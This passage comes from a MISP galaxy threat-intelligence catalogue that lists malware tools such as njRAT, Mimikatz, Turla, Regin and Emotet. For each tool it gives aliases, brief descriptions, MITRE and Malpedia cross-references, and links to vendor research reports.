  • PWOPyExec

  • PWOQuery

Table 16293. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwobot-targets-european-organizations/

Lost Door RAT

We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers.

The tag is: misp-galaxy:tool="Lost Door RAT"

Lost Door RAT is also known as:

  • LostDoor RAT

  • BKDR_LODORAT

Table 16294. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/

njRAT

The tag is: misp-galaxy:tool="njRAT"

njRAT is also known as:

  • Bladabindi

  • Jorik

njRAT has relationships with:

  • similar: misp-galaxy:malpedia="NjRAT" with estimative-language:likelihood-probability="likely"

Table 16295. Table References

Links

http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf

https://github.com/kevthehermit/RATDecoders/blob/master/yaraRules/njRat.yar

NanoCoreRAT

The tag is: misp-galaxy:tool="NanoCoreRAT"

NanoCoreRAT is also known as:

  • NanoCore

  • Nancrat

  • Zurten

  • Atros2.CKPN

NanoCoreRAT has relationships with:

  • similar: misp-galaxy:rat="NanoCore" with estimative-language:likelihood-probability="likely"

Table 16296. Table References

Links

http://www.symantec.com/connect/blogs/nanocore-another-rat-tries-make-it-out-gutter

https://nanocore.io/

Sakula

The tag is: misp-galaxy:tool="Sakula"

Sakula is also known as:

  • Sakurel

Sakula has relationships with:

  • similar: misp-galaxy:rat="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

Table 16297. Table References

Links

https://www.secureworks.com/research/sakula-malware-family

Hi-ZOR

The tag is: misp-galaxy:tool="Hi-ZOR"

Table 16298. Table References

Links

http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html

Derusbi

The tag is: misp-galaxy:tool="Derusbi"

Derusbi is also known as:

  • TROJ_DLLSERV.BE

Derusbi has relationships with:

  • similar: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Derusbi (Windows)" with estimative-language:likelihood-probability="likely"

Table 16299. Table References

Links

http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf

https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf

EvilGrab

The tag is: misp-galaxy:tool="EvilGrab"

EvilGrab is also known as:

  • BKDR_HGDER

  • BKDR_EVILOGE

  • BKDR_NVICM

  • Wmonder

EvilGrab has relationships with:

  • similar: misp-galaxy:mitre-malware="EvilGrab - S0152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

Table 16300. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/

http://researchcenter.paloaltonetworks.com/2015/06/evilgrab-delivered-by-watering-hole-attack-on-president-of-myanmars-website/

Trojan.Naid

The tag is: misp-galaxy:tool="Trojan.Naid"

Trojan.Naid is also known as:

  • Naid

  • Mdmbot.E

  • AGENT.GUNZ

  • AGENT.AQUP.DROPPER

  • AGENT.BMZA

  • MCRAT.A

  • AGENT.ABQMR

Trojan.Naid has relationships with:

  • similar: misp-galaxy:mitre-malware="Naid - S0205" with estimative-language:likelihood-probability="likely"

Table 16301. Table References

Links

https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid

http://telussecuritylabs.com/threats/show/TSL20120614-05

Moudoor

Backdoor.Moudoor, a customized version of Gh0st RAT.

The tag is: misp-galaxy:tool="Moudoor"

Moudoor is also known as:

  • SCAR

  • KillProc.14145

Table 16302. Table References

Links

http://www.darkreading.com/attacks-breaches/elite-chinese-cyberspy-group-behind-bit9-hack/d/d-id/1140495

https://securityledger.com/2013/09/apt-for-hire-symantec-outs-hidden-lynx-hacking-crew/

NetTraveler

APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.

The tag is: misp-galaxy:tool="NetTraveler"

NetTraveler is also known as:

  • TravNet

  • Netfile

NetTraveler has relationships with:

  • similar: misp-galaxy:mitre-malware="NetTraveler - S0033" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"

Table 16303. Table References

Links

https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/

Winnti

APT malware. As part of Operation SMN, Novetta analyzed recent versions of the Winnti malware. The samples, compiled from mid- to late 2014, exhibited minimal functional changes over the previous generations Kaspersky reported in 2013.

The tag is: misp-galaxy:tool="Winnti"

Winnti is also known as:

  • Etso

  • SUQ

  • Agent.ALQHI

  • RbDoor

  • RibDoor

  • HIGHNOON

Winnti has relationships with:

  • similar: misp-galaxy:mitre-malware="Winnti for Windows - S0141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"

Table 16304. Table References

Links

https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf

Mimikatz

Eases credential theft and replay; a little tool to play with Windows security.

The tag is: misp-galaxy:tool="Mimikatz"

Mimikatz is also known as:

  • Mikatz

Mimikatz has relationships with:

  • similar: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="almost-certain"

Table 16305. Table References

Links

https://github.com/gentilkiwi/mimikatz

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

WEBC2

Backdoor attributed to APT1.

The tag is: misp-galaxy:tool="WEBC2"

WEBC2 has relationships with:

  • similar: misp-galaxy:mitre-malware="WEBC2 - S0109" with estimative-language:likelihood-probability="likely"

Table 16306. Table References

Links

https://github.com/gnaegle/cse4990-practical3

https://www.securestate.com/blog/2013/02/20/apt-if-it-aint-broke

Pirpi

Symantec has observed Buckeye activity dating back to 2009, involving attacks on various organizations in several regions. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization’s network in 2009. The group delivered Backdoor.Pirpi through malicious attachments or links in convincing spear-phishing emails.

The tag is: misp-galaxy:tool="Pirpi"

Pirpi is also known as:

  • Badey

  • EXL

Pirpi has relationships with:

  • similar: misp-galaxy:mitre-malware="SHOTPUT - S0063" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="pirpi" with estimative-language:likelihood-probability="almost-certain"

Table 16307. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

RARSTONE

RARSTONE is a Remote Access Tool (RAT) discovered in early 2013 by Trend Micro. It is characterized by a great affinity with the other RAT known as PlugX, and was used in April for phishing campaigns that followed the attack on the Boston Marathon.

The tag is: misp-galaxy:tool="RARSTONE"

RARSTONE has relationships with:

  • similar: misp-galaxy:mitre-malware="RARSTONE - S0055" with estimative-language:likelihood-probability="likely"

Table 16308. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

Backspace

Backspace is a Backdoor that targets the Windows platform. This malware is reportedly associated with targeted attacks against Association of Southeast Asian Nations (ASEAN) members (APT30).

The tag is: misp-galaxy:tool="Backspace"

Backspace is also known as:

  • Lecna

Backspace has relationships with:

  • similar: misp-galaxy:mitre-malware="BACKSPACE - S0031" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="backspace" with estimative-language:likelihood-probability="almost-certain"

Table 16309. Table References

Links

https://www2.fireeye.com/WEB-2015RPTAPT30.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf

XSControl

Backdoor used by the Naikon APT group.

The tag is: misp-galaxy:tool="XSControl"

Table 16310. Table References

Links

https://securelist.com/analysis/publications/69953/the-naikon-apt/

https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf

Neteagle

NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as Scout and Norton.

The tag is: misp-galaxy:tool="Neteagle"

Neteagle is also known as:

  • scout

  • norton

Neteagle has relationships with:

  • similar: misp-galaxy:malpedia="NETEAGLE" with estimative-language:likelihood-probability="almost-certain"

Table 16311. Table References

Links

https://attack.mitre.org/wiki/Software/S0034

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Agent.BTZ

In November 2014, the experts of the G DATA SecurityLabs published an article about ComRAT, the Agent.BTZ successor. We explained that this case is linked to the Uroburos rootkit.

The tag is: misp-galaxy:tool="Agent.BTZ"

Agent.BTZ is also known as:

  • ComRat

Agent.BTZ has relationships with:

  • similar: misp-galaxy:rat="ComRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

Table 16312. Table References

Links

https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-from-agent-btz-to-comrat

Heseber BOT

RAT bundled with standard VNC (to avoid or limit A/V detection).

The tag is: misp-galaxy:tool="Heseber BOT"

Agent.dne

The tag is: misp-galaxy:tool="Agent.dne"

Wipbot

Waterbug is the name given to the actors who use the malware tool Trojan.Wipbot (also known as Tavdig and Epic Turla).

The tag is: misp-galaxy:tool="Wipbot"

Wipbot is also known as:

  • Tavdig

  • Epic Turla

  • WorldCupSec

  • TadjMakhal

Wipbot has relationships with:

  • similar: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"

Table 16313. Table References

Links

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf

Turla

Family of related sophisticated backdoor software. The name comes from the Microsoft detection signature, an anagram of Ultra (Ultra3 was the name of the fake driver). A macOS version exists but appears incomplete and lacking features... for now!

The tag is: misp-galaxy:tool="Turla"

Turla is also known as:

  • Snake

  • Uroburos

  • Urouros

Turla has relationships with:

  • similar: misp-galaxy:mitre-malware="Uroburos - S0022" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"

Table 16314. Table References

Links

https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf

https://objective-see.com/blog/blog_0x25.html#Snake

Winexe

The tag is: misp-galaxy:tool="Winexe"

Winexe has relationships with:

  • similar: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="likely"

Dark Comet

RAT initially identified in 2011 and still actively used.

The tag is: misp-galaxy:tool="Dark Comet"

Dark Comet has relationships with:

  • similar: misp-galaxy:rat="DarkComet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="likely"

Cadelspy

The tag is: misp-galaxy:tool="Cadelspy"

Cadelspy is also known as:

  • WinSpy

Cadelspy has relationships with:

  • similar: misp-galaxy:malpedia="CadelSpy" with estimative-language:likelihood-probability="almost-certain"

CMStar

The tag is: misp-galaxy:tool="CMStar"

CMStar has relationships with:

  • similar: misp-galaxy:malpedia="CMSTAR" with estimative-language:likelihood-probability="almost-certain"

Table 16315. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/

DHS2015

The tag is: misp-galaxy:tool="DHS2015"

DHS2015 is also known as:

  • iRAT

Table 16316. Table References

Links

https://securelist.com/files/2015/02/The-Desert-Falcons-targeted-attacks.pdf

Gh0st Rat

Gh0st Rat is a well-known Chinese remote access trojan which was originally made by C.Rufus Security Team several years ago. GH0ST is a backdoor written in C++ that communicates via a custom binary protocol over TCP or UDP. It typically features a packet signature at the start of each message that varies between samples. Availability: Public

The tag is: misp-galaxy:tool="Gh0st Rat"

Gh0st Rat is also known as:

  • Gh0stRat, GhostRat

Gh0st Rat has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16317. Table References

Links

http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Fakem RAT

Fakem RAT makes its network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: misp-galaxy:tool="Fakem RAT"

Fakem RAT is also known as:

  • FAKEM

Fakem RAT has relationships with:

  • similar: misp-galaxy:malpedia="Terminator RAT" with estimative-language:likelihood-probability="likely"

Table 16318. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf

MFC Huner

The tag is: misp-galaxy:tool="MFC Huner"

MFC Huner is also known as:

  • Hupigon

  • BKDR_HUPIGON

Table 16319. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/japan-us-defense-industries-among-targeted-entities-in-latest-attack/

Blackshades

Blackshades Remote Access Tool targets Microsoft Windows operating systems. Authors were arrested in 2012 and 2014.

The tag is: misp-galaxy:tool="Blackshades"

Blackshades has relationships with:

  • similar: misp-galaxy:rat="Blackshades" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BlackShades" with estimative-language:likelihood-probability="almost-certain"

Table 16320. Table References

Links

https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-and-fbi-assistant-director-charge-announce-charges-connection

https://blog.malwarebytes.org/intelligence/2012/06/you-dirty-rat-part-2-blackshades-net/

CHOPSTICK

Backdoor used by APT28.

The tag is: misp-galaxy:tool="CHOPSTICK"

CHOPSTICK is also known as:

  • webhp

  • SPLM

  • (.v2 fysbis)

CHOPSTICK has relationships with:

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

Table 16321. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

EVILTOSS

Backdoor used by APT28.

Sedreco serves as a spying backdoor; its functionalities can be extended with dynamically loaded plugins. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component since April 2016.

The tag is: misp-galaxy:tool="EVILTOSS"

EVILTOSS is also known as:

  • Sedreco

  • AZZY

  • ADVSTORESHELL

  • NETUI

EVILTOSS has relationships with:

  • similar: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"

Table 16322. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

GAMEFISH

Backdoor.

The tag is: misp-galaxy:tool="GAMEFISH"

GAMEFISH is also known as:

  • Sednit

  • Seduploader

  • JHUHUGIT

  • Sofacy

GAMEFISH has relationships with:

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

Table 16323. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

SOURFACE

Downloader; older version of CORESHELL.

The tag is: misp-galaxy:tool="SOURFACE"

SOURFACE is also known as:

  • Sofacy

SOURFACE has relationships with:

  • similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

Table 16324. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

OLDBAIT

Credential harvester.

The tag is: misp-galaxy:tool="OLDBAIT"

OLDBAIT is also known as:

  • Sasfis

  • BackDoor-FDU

  • IEChecker

OLDBAIT has relationships with:

  • similar: misp-galaxy:mitre-malware="OLDBAIT - S0138" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="OLDBAIT" with estimative-language:likelihood-probability="almost-certain"

Table 16325. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_sasfis.tl

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

CORESHELL

Downloader; newer version of SOURFACE.

The tag is: misp-galaxy:tool="CORESHELL"

CORESHELL is also known as:

  • Sofacy

CORESHELL has relationships with:

  • similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Coreshell" with estimative-language:likelihood-probability="almost-certain"

Table 16326. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

Havex RAT

The tag is: misp-galaxy:tool="Havex RAT"

Havex RAT is also known as:

  • Havex

Havex RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Havex RAT" with estimative-language:likelihood-probability="likely"

KjW0rm

RAT initially written in VB.

The tag is: misp-galaxy:tool="KjW0rm"

KjW0rm has relationships with:

  • similar: misp-galaxy:rat="KjW0rm" with estimative-language:likelihood-probability="likely"

Table 16327. Table References

Links

https://www.sentinelone.com/blog/understanding-kjw0rm-malware-we-dive-in-to-the-tv5-cyber-attack/

TinyTyphon

The tag is: misp-galaxy:tool="TinyTyphon"

TinyTyphon has relationships with:

  • similar: misp-galaxy:malpedia="TinyTyphon" with estimative-language:likelihood-probability="likely"

Badnews

The tag is: misp-galaxy:tool="Badnews"

Badnews has relationships with:

  • similar: misp-galaxy:malpedia="BadNews" with estimative-language:likelihood-probability="almost-certain"

LURK

The tag is: misp-galaxy:tool="LURK"

LURK has relationships with:

  • similar: misp-galaxy:malpedia="Lurk" with estimative-language:likelihood-probability="almost-certain"

Oldrea

The tag is: misp-galaxy:tool="Oldrea"

AmmyAdmin

The tag is: misp-galaxy:tool="AmmyAdmin"

Matryoshka

The tag is: misp-galaxy:tool="Matryoshka"

Matryoshka has relationships with:

  • similar: misp-galaxy:rat="Matryoshka" with estimative-language:likelihood-probability="likely"

TinyZBot

The tag is: misp-galaxy:tool="TinyZBot"

TinyZBot has relationships with:

  • similar: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TinyZbot" with estimative-language:likelihood-probability="almost-certain"

GHOLE

The tag is: misp-galaxy:tool="GHOLE"

GHOLE has relationships with:

  • similar: misp-galaxy:malpedia="Ghole" with estimative-language:likelihood-probability="almost-certain"

CWoolger

The tag is: misp-galaxy:tool="CWoolger"

FireMalv

The tag is: misp-galaxy:tool="FireMalv"

FireMalv has relationships with:

  • similar: misp-galaxy:malpedia="FireMalv" with estimative-language:likelihood-probability="likely"

Regin

Regin (also known as Prax or WarriorPride) is a sophisticated malware toolkit revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. The malware targets specific users of Microsoft Windows-based computers and has been linked to the US intelligence gathering agency NSA and its British counterpart, the GCHQ. The Intercept provided samples of Regin for download including malware discovered at Belgian telecommunications provider, Belgacom. Kaspersky Lab says it first became aware of Regin in spring 2012, but that some of the earliest samples date from 2003. The name Regin is first found on the VirusTotal website on 9 March 2011.

The tag is: misp-galaxy:tool="Regin"

Regin is also known as:

  • Prax

  • WarriorPride

Regin has relationships with:

  • similar: misp-galaxy:mitre-malware="Regin - S0019" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"

Table 16328. Table References

Links

https://en.wikipedia.org/wiki/Regin_(malware)

Duqu

The tag is: misp-galaxy:tool="Duqu"

Duqu has relationships with:

  • similar: misp-galaxy:mitre-malware="Duqu - S0038" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DuQu" with estimative-language:likelihood-probability="almost-certain"

Flame

The tag is: misp-galaxy:tool="Flame"

Flame has relationships with:

  • similar: misp-galaxy:mitre-malware="Flame - S0143" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Flame" with estimative-language:likelihood-probability="almost-certain"

Stuxnet

The tag is: misp-galaxy:tool="Stuxnet"

Stuxnet has relationships with:

  • similar: misp-galaxy:malpedia="Stuxnet" with estimative-language:likelihood-probability="likely"

EquationLaser

The tag is: misp-galaxy:tool="EquationLaser"

EquationDrug

The tag is: misp-galaxy:tool="EquationDrug"

EquationDrug has relationships with:

  • similar: misp-galaxy:malpedia="EquationDrug" with estimative-language:likelihood-probability="likely"

DoubleFantasy

The tag is: misp-galaxy:tool="DoubleFantasy"

TripleFantasy

The tag is: misp-galaxy:tool="TripleFantasy"

Fanny

The tag is: misp-galaxy:tool="Fanny"

Fanny has relationships with:

  • similar: misp-galaxy:malpedia="Fanny" with estimative-language:likelihood-probability="likely"

GrayFish

The tag is: misp-galaxy:tool="GrayFish"

Babar

The tag is: misp-galaxy:tool="Babar"

Babar has relationships with:

  • similar: misp-galaxy:malpedia="Babar" with estimative-language:likelihood-probability="likely"

Bunny

The tag is: misp-galaxy:tool="Bunny"

Casper

The tag is: misp-galaxy:tool="Casper"

Casper has relationships with:

  • similar: misp-galaxy:malpedia="Casper" with estimative-language:likelihood-probability="likely"

NBot

The tag is: misp-galaxy:tool="NBot"

Tafacalou

The tag is: misp-galaxy:tool="Tafacalou"

Tdrop

The tag is: misp-galaxy:tool="Tdrop"

Troy

The tag is: misp-galaxy:tool="Troy"

Tdrop2

The tag is: misp-galaxy:tool="Tdrop2"

ZXShell

ZxShell is a remote access trojan (RAT). It was developed in 2006 by the persona "LZX", who then publicly released the source code in 2007.

The tag is: misp-galaxy:tool="ZXShell"

ZXShell is also known as:

  • Sensode

ZXShell has relationships with:

  • similar: misp-galaxy:malpedia="ZXShell" with estimative-language:likelihood-probability="likely"

Table 16329. Table References

Links

http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html

https://blogs.cisco.com/security/talos/opening-zxshell

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

T9000

The tag is: misp-galaxy:tool="T9000"

T9000 has relationships with:

  • similar: misp-galaxy:mitre-malware="T9000 - S0098" with estimative-language:likelihood-probability="likely"

Table 16330. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

T5000

The tag is: misp-galaxy:tool="T5000"

T5000 is also known as:

  • Plat1

Table 16331. Table References

Links

http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml

Taidoor

The tag is: misp-galaxy:tool="Taidoor"

Taidoor has relationships with:

  • similar: misp-galaxy:mitre-malware="Taidoor - S0011" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="taidoor" with estimative-language:likelihood-probability="almost-certain"

Table 16332. Table References

Links

http://www.symantec.com/connect/blogs/trojantaidoor-takes-aim-policy-think-tanks

Rekaf

The tag is: misp-galaxy:tool="Rekaf"

Table 16334. Table References

Links

https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

Scieron

The tag is: misp-galaxy:tool="Scieron"

Scieron has relationships with:

  • similar: misp-galaxy:malpedia="Scieron" with estimative-language:likelihood-probability="almost-certain"

SkeletonKey

The tag is: misp-galaxy:tool="SkeletonKey"

Table 16335. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

Skyipot

The tag is: misp-galaxy:tool="Skyipot"

Table 16336. Table References

Links

http://labs.alienvault.com/labs/index.php/2011/another-sykipot-sample-likely-targeting-us-federal-agencies/

Spindest

The tag is: misp-galaxy:tool="Spindest"

Table 16337. Table References

Links

http://www.threatconnect.com/news/threatconnect-enables-healthy-networking-biomed-life-sciences-industry/

Preshin

The tag is: misp-galaxy:tool="Preshin"

Oficla

The tag is: misp-galaxy:tool="Oficla"

Oficla has relationships with:

  • similar: misp-galaxy:botnet="BredoLab" with estimative-language:likelihood-probability="likely"

PCClient RAT

The tag is: misp-galaxy:tool="PCClient RAT"

Table 16338. Table References

Links

http://researchcenter.paloaltonetworks.com/2014/10/new-indicators-compromise-apt-group-nitro-uncovered/

Plexor

The tag is: misp-galaxy:tool="Plexor"

Mongall

The tag is: misp-galaxy:tool="Mongall"

Mongall has relationships with:

  • similar: misp-galaxy:malpedia="mongall" with estimative-language:likelihood-probability="almost-certain"

Table 16339. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

NeD Worm

The tag is: misp-galaxy:tool="NeD Worm"

NeD Worm has relationships with:

  • similar: misp-galaxy:mitre-malware="DustySky - S0062" with estimative-language:likelihood-probability="likely"

Table 16340. Table References

Links

http://www.clearskysec.com/dustysky/

NewCT

The tag is: misp-galaxy:tool="NewCT"

NewCT has relationships with:

  • similar: misp-galaxy:malpedia="NewCT" with estimative-language:likelihood-probability="likely"

Table 16341. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Nflog

The tag is: misp-galaxy:tool="Nflog"

Table 16342. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Janicab

The tag is: misp-galaxy:tool="Janicab"

Janicab has relationships with:

  • similar: misp-galaxy:mitre-malware="Janicab - S0163" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Janicab (OS X)" with estimative-language:likelihood-probability="almost-certain"

Table 16343. Table References

Links

http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/

Jripbot

The tag is: misp-galaxy:tool="Jripbot"

Jripbot is also known as:

  • Jiripbot

Jripbot has relationships with:

  • similar: misp-galaxy:malpedia="JripBot" with estimative-language:likelihood-probability="almost-certain"

Table 16344. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/butterfly-corporate-spies-out-for-financial-gain.pdf

Jolob

The tag is: misp-galaxy:tool="Jolob"

Jolob has relationships with:

  • similar: misp-galaxy:malpedia="Jolob" with estimative-language:likelihood-probability="likely"

Table 16345. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html

IsSpace

The tag is: misp-galaxy:tool="IsSpace"

IsSpace has relationships with:

  • similar: misp-galaxy:malpedia="IsSpace" with estimative-language:likelihood-probability="likely"

Table 16346. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Emotet

The tag is: misp-galaxy:tool="Emotet"

Emotet is also known as:

  • Geodo

Emotet has relationships with:

  • similar: misp-galaxy:banker="Geodo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 16347. Table References

Links

https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/

https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet

https://www.bleepingcomputer.com/news/security/emotet-returns-with-thanksgiving-theme-and-better-phishing-tricks/

